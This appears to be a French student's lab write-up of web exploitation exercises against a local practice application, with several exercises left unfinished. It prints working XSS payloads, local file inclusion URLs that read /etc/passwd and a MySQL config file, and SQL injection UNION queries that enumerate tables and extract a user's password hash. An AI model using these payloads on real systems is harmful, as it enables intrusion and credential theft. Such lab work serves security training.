# Exploitation des applis web

## Exercice 1 - XSS

Exploitation de la faille XSS présente sur la page pour afficher un message d'alerte en utilisant un input.

Code inséré :

``` html
<script>alert("pouet pouet")</script>
```

## Exercice 2 - XSS

Exploitation de la faille XSS présente sur la page pour rediriger vers une autre page en utilisant un input.

Code inséré :

``` html
<script>document.location='http://www.google.com'</script>
```

## Exercice 3 - XSS

*A renseigner*

Pas fini reste à exploiter le cookie

## Exercice 4 - Injection de commandes

pas fini

## Exercice 5 - Injection de commandes

pas fini

## Exercice 6 - Local file injection

On souhaite affcher le contenu du fichier "/etc/passwd".

On modifie l'adresse dans la barre de recherche pour obtenir : `http://localhost/vulnerabilities/fi/?page=/etc/passwd`

## Exercice 7 - Local file injection

On souhaite afficher le contenu du fichier de configuration de la connexion à MySQL ("/config/config.inc.php").

On modifie d'abord l'adresse en utiisant un chemin absolu pour obtenir :
`http://localhost/vulnerabilities/fi/?page=/var/www/html/config/config.inc.php`

On obtient une page blanche. Il va falloir faire en sorte que le code PHP ne soit pas exécuté.

On peut coder le fichier en base64 pour récupérer le code du fichier puis le re convertir en PHP en modifiant l'adresse de cette manière :
`http://localhost/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=/var/www/html/config/config.inc.php`

## Exercice 8 - Injection SQL

Le caractère qui provoque une erreur SQL est le caractère `'` car il permet de terminer la requête.

## Exercice 9 - Injection SQL

On veut connaître le nombre de colonnes visibles

On cherche à tâtons en entrant :  

```sql
'UNION SELECT 2,3,4'
```

On fait ensuit varier le nombre de chiffres suivant le `SELECT`, et en fonction du nombre on obtient le nombre de colonnes.

## Exercice 10 - Injection SQL

On veut connaître les noms des bases de données et tables existantes

On va chercher ces informations dans la table `TABLE` de la base de données `INFORMATION_SCHEMA` :

``` sql
' UNION SELECT table_name, table_schema from information_schema.tables #
```

## Exercice 11

On veut connaître les colonnes de la table `USERS`.

On va utiliser la table `COLUMNS` de la base de données `INFORMATION_SCHEMA` et on va filtrer sur la table `USERS` :

``` sql
' UNION SELECT table_name, column_name from information_schema.columns where table_name='users' #
```

## Exercice 12

On souhaite connapitre le mot de passe de l'utilisateur "pablo".

En utilisant les données récupérées précédemment, on en déduit la requête suivante, qui va renvoyer le nom d'utilisateur et le mot de passe de notre utilisateur "pablo" :

``` sql
' UNION SELECT user, password from users where user='pablo' #
```

La requête nous retourne un mot de passe encodé, nous savons qu'il s'agit de md5, on peut donc utiliser un converter en ligne pour retrouver le mot de passe `letmein`.
